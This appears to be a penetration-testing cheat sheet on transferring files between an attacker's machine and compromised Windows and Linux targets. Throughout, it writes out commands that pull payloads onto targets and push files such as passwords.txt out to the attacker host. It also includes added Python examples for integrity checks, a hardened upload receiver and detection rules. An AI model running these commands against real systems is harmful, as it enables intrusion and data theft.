
File Transfer Techniques

TFTP

If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on your attack box to transfer files https://www.rapid7.com/db/modules/auxiliary/server/tftp/

Attack Box Side

# Start Metasploit Framework
sudo msfconsole

# Start a TFTP server and serve files out of the /tmp/evil directory
msf6> use auxiliary/server/tftp
msf6> set OUTPUTPATH /tmp/evil
msf6> set TFTPROOT /tmp/evil
msf6> run

# Stop the TFTP server
# List jobs and find server job
msf6> jobs
# Kill TFTP server job with an ID of 1
msf6> jobs -k 1



Target Side

# Copy a file from the Attack Box to the target
# Assumes the Attack Box IP is 10.50.50.11
tftp -i 10.50.50.11 GET filename.txt C:\Windows\Temp\filename.txt

# Copy a file to the Attack Box
# Assumes the Attack Box IP is 10.50.50.11
# This will put the file in /tmp/evil
tftp -i 10.50.50.11 PUT C:\Windows\Temp\filename.txt filename.txt




FTP

Attack Box Running FTP Server

# Show help message
sudo python3 -m pyftpdlib --help

# Serve the /tmp directory read/write on Kali with anonymous login
sudo python3 -m pyftpdlib -d /tmp --write --port=21

# Serve the /tmp directory read/write with authentication
sudo python3 -m pyftpdlib -d /tmp -u "username" -P "password" --write --port=21



Linux Target

# Connect to Kali FTP anonymously
# Username: anonymous
# Password: [Press ENTER key]
ftp kali-ip-address

# Connect with credentials
# Username: username
# Password: password
ftp kali-ip-address



Windows Target

# Connect Anonymously
ftp -A kali-ip-address

# Connect with credentials
# Enter the username and password when prompted
ftp kali-ip-address





FTP Server on Target

# Connect to an FTP server from Kali anonymously
# Press ENTER key if prompted for password
ftp anonymous@target-ip-address

# Connect to target FTP server with credentials
ftp "ftp://username:password@target-ip-address"





SCP

The most fundamental syntax for using scp is this:

# Password Authentication 
# -----------------------
# Transfer from Local to Remote
scp [local-path] [username]@[target-ip]:[remote-path]

# Transfer from Remote to Local
scp [username]@[target-ip]:[remote-path] [local-path]


# Private Key Authentication 
# --------------------------
# Transfer from Local to Remote
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [local-path] [username]@[target-ip]:[remote-path]

# Transfer from Remote to Local
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [username]@[target-ip]:[remote-path] [local-path]



Linux Target Running SSH Server

From Attack Box

  • Transfer a payload from /tmp/payload on the Attack Box to /tmp/pwnz on the target


Password Authentication
scp /tmp/payload johndoe@target-ip:/tmp/pwnz


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe /tmp/payload johndoe@target-ip:/tmp/pwnz



To Attack Box

  • You want to transfer /home/johndoe/passwords.txt to /tmp/passwords.txt your Attack Box
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp johndoe@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt



Windows Target Running SSH Server

From Attack Box

  • Transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/



To Attack Box

  • You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /tmp/passwords.txt on the Attack Box
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/


Attack Box Running SSH Server

  1. Create a junk user account on your attack box
  2. Create an SSH key pair
  3. Add the public key string to /home/junkuser/.ssh/authorized_keys
  4. Transfer the private key to the target
  5. Run one of the commands below
  6. Destroy the authentication mechanism!
    • Don't leave access to your attack box on the host
    • Do one of the following (or both):
      • Delete the private key off the target: rm -rf /path/to/privatekey
      • Delete the junkuser account from the attack box:  sudo userdel -rf junkuser



Windows Target

  • SSH private key for junkuser account on Attack Box is stored at C:\Windows\Temp\junk-key.pem


From Attack Box
  • You want to transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload.exe C:\Windows\Temp\


To Attack Box
  • You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /home/junkuser/ on the Attack Box
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem C:\Users\JohnDoe\Desktop\passwords.txt junkuser@attack-box-ip:/home/junkuser/

Linux Target

  • SSH private key for junkuser account on Attack Box is stored at /tmp/junk-key.pem


From Attack Box
  • You want to transfer a payload from /home/junkuser/payload on the Attack Box to /tmp/ on the target
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload /tmp/


To Attack Box
  • You want to transfer /home/johndoe/passwords.txt to /home/junkuser/ on the Attack Box
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem /home/johndoe/passwords.txt junkuser@attack-box-ip:/home/junkuser/



Netcat

Listener on Attack Box

# Start a listener on the attack box and write whatever arrives to a file
nc -lnvp 53 > /tmp/got-the-file

# On the target: connect to the listener and push the file
nc -nv attack-box-ip 53 < /path/to/file



Listener on Target

Hint: You may also want to start the listener on the target in the background, as CTRL+C will likely kill your reverse shell.

# Start a listener on the target that serves the file to the first connection
nc -lnvp 55555 < /path/to/file

# On the attack box: connect to the listener and pull in the file
nc -nv target-ip 55555 > /tmp/got-the-file





Socat

Listener on Attack Box

# Start a listener on the attack box and create a file when received
socat TCP4-LISTEN:<port>,fork file:/tmp/got-the-file,create

# Connect and transfer the file to your attack box
socat TCP4:attack-box-ip:<port> file:/path/to/file


Listener on Target

Hint: You may also want to start the listener on the target in the background, as CTRL+C will likely kill your reverse shell.

# Start a listener and host a file on the target
socat TCP4-LISTEN:<port>,fork file:/path/to/file

# Connect and receive the file on your attack box
socat TCP4:target-ip:<port> file:/tmp/got-the-file,create
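Neither nc nor socat signals where the file ends or whether it arrived intact; the receiving side simply writes until the connection closes, so a dropped connection or a killed shell leaves a truncated file that looks complete. The Python script below is an added example, not code from this page: a minimal sender/receiver pair that frames the file with a length prefix and a SHA-256 trailer so the receiver can confirm integrity before trusting what it got. It runs both sides over loopback with a constructed payload; the host, the ephemeral port and the payload are assumptions for the demo, and the corrupt flag simulates a byte damaged in transit to show the failure path.

```python
import hashlib
import hmac
import socket
import struct
import threading

# Constructed sample payload; stands in for /path/to/file on the page
SAMPLE = b"example payload bytes\n" * 100


def send_file(host, port, data, corrupt=False):
    """Sending side: 8-byte big-endian length, the bytes, then a SHA-256 trailer.

    corrupt=True flips one byte after the digest is computed, simulating
    damage in transit so the receiver's check can be seen to fail.
    """
    digest = hashlib.sha256(data).digest()
    if corrupt:
        data = data[:10] + bytes([data[10] ^ 0xFF]) + data[11:]
    with socket.create_connection((host, port)) as s:
        s.sendall(struct.pack("!Q", len(data)) + data + digest)
        status = s.recv(2)       # receiver answers b"OK" or b"NO"
    return status == b"OK"


def recv_exact(conn, n):
    """Read exactly n bytes or raise; plain nc cannot tell short from complete."""
    buf = bytearray()
    while len(buf) < n:
        chunk = conn.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def receive_file(listen_sock):
    """Receiving side: accept one connection, return (data, verified)."""
    conn, _ = listen_sock.accept()
    with conn:
        (length,) = struct.unpack("!Q", recv_exact(conn, 8))
        data = recv_exact(conn, length)
        expected = recv_exact(conn, 32)
        ok = hmac.compare_digest(hashlib.sha256(data).digest(), expected)
        conn.sendall(b"OK" if ok else b"NO")
    return data, ok


def transfer_over_loopback(data, corrupt=False):
    """Run both sides on 127.0.0.1; returns (received, receiver_ok, sender_ok)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))           # ephemeral port (assumption for the demo)
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}

    def server():
        result["data"], result["ok"] = receive_file(srv)

    t = threading.Thread(target=server)
    t.start()
    sender_ok = send_file("127.0.0.1", port, data, corrupt)
    t.join()
    srv.close()
    return result["data"], result["ok"], sender_ok


if __name__ == "__main__":
    received, ok, sender_ok = transfer_over_loopback(SAMPLE)
    print("intact transfer verified:", ok and received == SAMPLE)
    _, ok, _ = transfer_over_loopback(SAMPLE, corrupt=True)
    print("corrupted transfer detected:", not ok)
```

The length prefix is what lets the receiver distinguish "connection closed early" from "file complete", which is exactly the case the CTRL+C hint above warns about; the digest trailer catches silent corruption, and the two-byte reply tells the sender whether it needs to retry.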





Web

Apache (Upload to Attack Box)

  1. Create upload.php in /var/www/html/ on attack box
<?php
    $uploadDirectory = '/var/www/html/uploads/';
    // basename() keeps a client-supplied name such as ../../x from escaping the uploads directory
    $uploadFile = $uploadDirectory . basename($_FILES['file']['name']);
    move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile);
?>
  2. Create an upload directory on attack box: mkdir /var/www/html/uploads
  3. Change permissions: sudo chown www-data:www-data /var/www/html/uploads
  4. Start Apache web server on attack box: sudo systemctl start apache2
  5. On target:
    • curl -X POST -H "Content-Type: multipart/form-data" --form file=@"/path/to/file" http://attack-box-ip/upload.php (note: you could use curl -k and https if your attack box is running HTTP over TLS to encrypt the file transfer)
    • If the target is a Windows host, you can run this PowerShell command to upload the file: [System.Net.WebClient]::new().UploadFile('http://attack-box-ip/upload.php', 'C:\Absolute\Path\To\File')
  6. Receive file on attack box
  7. Stop web server on attack box: sudo systemctl stop apache2
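The upload.php receiver above writes the client-supplied filename into the uploads directory, so any receiver of this kind needs the name reduced to a plain basename and the request size bounded before it is safe to leave listening. As an added example that is not from the page, the Python script below is a stand-alone upload receiver built on the standard library's http.server that accepts the same curl and WebClient POST as upload.php and applies both checks. UPLOAD_DIR, the port and the multipart body used to exercise the parser are assumed or constructed values.

```python
import os
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_DIR = "/tmp/uploads"          # assumed location; not from the page
MAX_BYTES = 50 * 1024 * 1024         # refuse bodies larger than 50 MiB
# Allowlist: leading alphanumeric, then letters, digits, dot, dash, underscore
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def safe_name(raw):
    """Reduce a client-supplied filename to a plain basename, or None if unusable.

    Both slash styles count as separators, so '..\\..\\x' and '../../x'
    collapse to 'x'; dotfiles and names with odd characters are rejected.
    """
    name = raw.replace("\\", "/").split("/")[-1].strip()
    return name if SAFE_NAME.match(name) else None


def parse_multipart(body, boundary):
    """Parse one multipart/form-data body into {field: (filename, data)}.

    Handles the layout curl --form produces: parts separated by '--boundary',
    headers terminated by a blank line, and a closing '--boundary--'.
    """
    delim = b"--" + boundary
    parts = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        if not chunk.startswith(b"\r\n"):
            raise ValueError("malformed multipart part")
        head, _, data = chunk[2:].partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):           # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = head.decode("latin-1")
        field = re.search(r'[;\s]name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        if field:
            parts[field.group(1)] = (fname.group(1) if fname else None, data)
    return parts


class UploadHandler(BaseHTTPRequestHandler):
    """Accepts the same curl/WebClient POST as upload.php, with checks added."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        ctype = self.headers.get("Content-Type", "")
        if length <= 0 or length > MAX_BYTES or "boundary=" not in ctype:
            self.send_error(400, "expected a bounded multipart/form-data body")
            return
        boundary = ctype.split("boundary=", 1)[1].split(";")[0].strip('"').encode()
        parts = parse_multipart(self.rfile.read(length), boundary)
        filename, data = parts.get("file", (None, b""))
        name = safe_name(filename or "")
        if name is None:
            self.send_error(400, "rejected filename")
            return
        os.makedirs(UPLOAD_DIR, exist_ok=True)
        with open(os.path.join(UPLOAD_DIR, name), "wb") as fh:
            fh.write(data)
        self.send_response(201)
        self.end_headers()
        self.wfile.write(b"stored %d bytes as %s\n" % (len(data), name.encode()))


if __name__ == "__main__":
    # Stand-in for the Apache setup above; port 8000 is an assumption
    HTTPServer(("0.0.0.0", 8000), UploadHandler).serve_forever()
```

The handler ignores the request path, so the curl command from step 5 works unchanged apart from the port. Note that, unlike Apache, nothing here serves the uploads directory back out.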



Python Web Server

Python 2 vs. Python 3

# Start a web server in Python 3 on TCP port 50011
python3 -m http.server 50011

# Start a web server in Python 2 on TCP port 50011
python2 -m SimpleHTTPServer 50011


Transfer from Attack Box

Example: You've got a payload in the /tmp folder on the Attack Box that you want to transfer to a target.

To Windows

# On Attack Box
cd /tmp
python3 -m http.server 80

# On Windows
# cmd.exe
certutil.exe -urlcache -split -f "http://attack-ip/filename" "filename"
# PowerShell
Invoke-WebRequest -Uri 'http://attack-ip/filename' -OutFile 'C:\Windows\Temp\filename'


To Linux

# On Attack Box
cd /tmp
python3 -m http.server 80

# On Linux (store in /tmp on the target)
# curl
curl http://attack-ip/filename -o /tmp/filename

# wget
wget http://attack-ip/filename -O /tmp/filename


Transfer to Attack Box

Example: There is a file on the target you want to transfer to Kali

From Windows

Assumes Python is installed on the Windows target

# On Windows
cd C:\Users\johndoe\Desktop
python3 -m http.server 51110

# On Attack Box (store in Downloads folder)
# curl
curl http://target-ip:51110/filename -o ~/Downloads/filename

# wget
wget http://target-ip:51110/filename -O ~/Downloads/filename


From Linux

# On Linux
cd /home/johndoe
python3 -m http.server 51110

# On Attack Box (store in Downloads folder)
# curl
curl http://target-ip:51110/filename -o ~/Downloads/filename

# wget
wget http://target-ip:51110/filename -O ~/Downloads/filename





SMB

SMB Server on Attack Box

For this, we can use Impacket's smbserver.py script to run an ad-hoc SMB server. There are two required arguments:

  • Share Name
  • Share Path

You can also configure the SMB server with:

  • Username + Password authentication
  • NTLM hash authentication
  • Specific IP binding
  • Specific port binding (TCP/445 is default)
  • And more...

Attack Box Side

# Print help message
smbserver.py -h

# Serve an anonymous SMB share called "EvilShare" from the /tmp directory on attack box
smbserver.py -smb2support EvilShare /tmp

# Serve a SMB share with password authentication
smbserver.py -smb2support -username 'secretuser' -password 'secretpass' MyShare /tmp


Windows Client

cmd.exe
# Anonymous share
# ---------------
# List files in share
dir \\attackbox-ip-address\EvilShare\
# List a specific file in a share
dir \\attackbox-ip-address\EvilShare\filename.txt
# Copy a file from the share to the target
copy \\attackbox-ip-address\EvilShare\filename.txt C:\Windows\Temp\filename.txt
# Copy a file from the target to the share
copy C:\Windows\Temp\filename.txt \\attackbox-ip-address\EvilShare\filename.txt
# Unmap the share
net use \\attackbox-ip-address\EvilShare /DELETE

# Authenticated Share
# -------------------
# Authenticate as "secretuser" with the password "secretpass"
# (cmd.exe does not treat single quotes as quoting, so the password goes unquoted)
net use \\attackbox-ip-address\MyShare secretpass /user:secretuser
# List files in share
dir \\attackbox-ip-address\MyShare\
# List a specific file in a share
dir \\attackbox-ip-address\MyShare\filename.txt
# Copy a file from the share to the target
copy \\attackbox-ip-address\MyShare\filename.txt C:\Windows\Temp\filename.txt
# Copy a file from the target to the share
copy C:\Windows\Temp\filename.txt \\attackbox-ip-address\MyShare\filename.txt
# Unmap the share
net use \\attackbox-ip-address\MyShare /DELETE


powershell.exe

SmbShare Module

  • Requires PowerShell v5+ and Windows 10 or newer
  • See PSDrive cmdlets below for older clients
  • The net use commands are also an option in PowerShell
# Anonymous Share
# ---------------
# Map "EvilShare" from Attack Box
New-SmbMapping -LocalPath 'Z:' -RemotePath \\kali.cyber.range\EvilShare
# List Items in the Share
Get-ChildItem Z:\
# List a file in the share
Get-ChildItem Z:\filename.txt
# Copy an item from the share
Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt Z:\
# Remove the share
Remove-SmbMapping -LocalPath 'Z:' -Force

# Authenticated Share
# ------------------
# Map "MyShare" from Attack Box with the username "secretuser" and the password "secretpass"
New-SmbMapping -LocalPath 'X:' -RemotePath \\kali.cyber.range\MyShare -UserName 'secretuser' -Password 'secretpass'
# List items in the share
Get-ChildItem X:\
# Copy an item from the share
Copy-Item X:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt X:\
# Remove the share
Remove-SmbMapping -LocalPath 'X:' -Force


PSDrive Cmdlets

# Anonymous Share
# ---------------
# Map "EvilShare" from Attack Box
New-PSDrive -Name 'Z' -PSProvider FileSystem -Root \\attackbox-ip-address\EvilShare
# List Items in the Share
Get-ChildItem Z:\
# List a file in the share
Get-ChildItem Z:\filename.txt
# Copy an item from the share
Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt Z:\
# Remove the share
Remove-PSDrive -Name 'Z'


# Authenticated Share
# ------------------
# Map "MyShare" from Attack Box with the username "secretuser" and the password "secretpass"
$username = 'secretuser'
$password = 'secretpass' | ConvertTo-SecureString -AsPlainText -Force
$credential = New-Object PSCredential -ArgumentList $username,$password
New-PSDrive -Name 'X' -PSProvider FileSystem -Root \\attackbox-ip-address\MyShare -Credential $credential

# List items in the share
Get-ChildItem X:\
# Copy an item from the share
Copy-Item X:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt X:\
# Remove the share
Remove-PSDrive -Name 'X'



SMB Server on Target

Attack Box Side

# Anonymous Authentication
# ------------------------
# Enumerate shares
smbclient -L //target-ip-address -U '' --option="client min protocol=core"
# Map a share
smbclient //target-ip-address/ShareName -U '' --option="client min protocol=core"
# Copy a file from the target to Attack Box
smb: \> get filename.txt /tmp/filename.txt
# Copy a file to the target
smb: \> put /tmp/filename.txt filename.txt


# Authenticated Share
# -------------------
# Enumerate shares
# Local user
smbclient -L //target-ip-address -U 'username%password' --option="client min protocol=core"
# Domain user 
smbclient -L //target-ip-address -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

# Map a share
# Local user
smbclient //target-ip-address/ShareName -U 'username%password' --option="client min protocol=core"
# Domain user 
smbclient //target-ip-address/ShareName -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"
# Copy a file from the target to Attack Box
smb: \> get filename.txt /tmp/filename.txt
# Copy a file to the target
smb: \> put /tmp/filename.txt filename.txt

PowerShell Remoting (WinRM)

WinRM runs on TCP port 5985 for unencrypted sessions and 5986 for encrypted sessions.

# Open a PSSession on the target host
$computerName = 'computer_name_here' # Kerberos requires a FQDN, NTLM uses IP address
$credential = Get-Credential # Username and password used to log onto the target
$psSessionParameters = @{
  ComputerName = $computerName
  Credential = $credential
  Authentication = 'Kerberos' # For NTLM use Default
}
$session = New-PSSession @psSessionParameters

# Copy a file to the remote session
# For example:
#    Copy the file shell.exe to the target
#    The target directory will be C:\Windows\Temp in this example
Copy-Item "C:\Users\evil.user\Desktop\shell.exe" "C:\Windows\Temp" -ToSession $session

# Copy a file from the remote session
# For example:
#    Copy the file flag.txt from the target
#    Back to C:\Users\evil.user\Desktop
Copy-Item "C:\Users\jane.doe\Desktop\flag.txt" "C:\Users\evil.user\Desktop" -FromSession $session
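Every client-side command on this page leaves a process-creation record (Sysmon Event ID 1 or Security Event 4688) on the host it runs on, and it is the argument string, not the binary name, that separates a file transfer from ordinary use of certutil, tftp, copy or scp. The Python script below is an added example, not part of the original page: it runs a handful of command-line patterns drawn from the certutil, tftp, PowerShell, SMB copy and scp sections above over constructed process-creation records and reports which rules fire. The records, rule names and the two-field (image, command line) layout are constructed for the example; the IP address is the same placeholder the page uses.

```python
import re

# Constructed process-creation records (not real telemetry): (image, command line),
# mimicking what Sysmon Event ID 1 or Security 4688 captures for each launch.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     'certutil.exe -urlcache -split -f "http://10.50.50.11/payload.exe" payload.exe'),
    ("C:\\Windows\\System32\\tftp.exe",
     "tftp -i 10.50.50.11 GET filename.txt C:\\Windows\\Temp\\filename.txt"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -c Invoke-WebRequest -Uri 'http://10.50.50.11/f' -OutFile 'C:\\Windows\\Temp\\f'"),
    ("C:\\Windows\\System32\\cmd.exe",
     "copy \\\\10.50.50.11\\EvilShare\\f.exe C:\\Windows\\Temp\\f.exe"),
    ("C:\\Windows\\System32\\OpenSSH\\scp.exe",
     'scp -o "StrictHostKeyChecking=no" -i C:\\Windows\\Temp\\k.pem C:\\Users\\j\\Desktop\\passwords.txt u@10.50.50.11:/home/u/'),
    # Benign uses of the same binaries: these should not match
    ("C:\\Windows\\System32\\certutil.exe", "certutil.exe -verify cert.cer"),
    ("C:\\Windows\\System32\\cmd.exe", "copy C:\\a.txt C:\\b.txt"),
]

# Each rule keys on the argument pattern the transfer needs, not on the binary alone
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("tftp_client_transfer",
     re.compile(r"\btftp(\.exe)?\s+-i\b.*\b(get|put)\b", re.I)),
    ("powershell_web_download",
     re.compile(r"(Invoke-WebRequest|iwr|WebClient)\b.*(-OutFile|DownloadFile|UploadFile)", re.I)),
    ("unc_copy_to_ip",
     re.compile(r"\b(copy|xcopy|robocopy)\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
    ("scp_nohostcheck_keyfile",
     re.compile(r"\bscp(\.exe)?\b.*StrictHostKeyChecking=no.*\s-i\s", re.I)),
]


def classify(cmdline):
    """Return the names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Run all rules over (image, cmdline) records; return (rule, basename, cmdline) hits."""
    hits = []
    for image, cmd in events:
        for rule in classify(cmd):
            hits.append((rule, image.rsplit("\\", 1)[-1], cmd))
    return hits


if __name__ == "__main__":
    for rule, exe, cmd in scan(SAMPLE_EVENTS):
        print("%-26s %-16s %s" % (rule, exe, cmd))
```

The two benign records at the end of the sample are the point of keying on arguments: certutil -verify and a local copy use the same images as the transfers but trip none of the rules, which is what keeps a rule like this usable on a busy host.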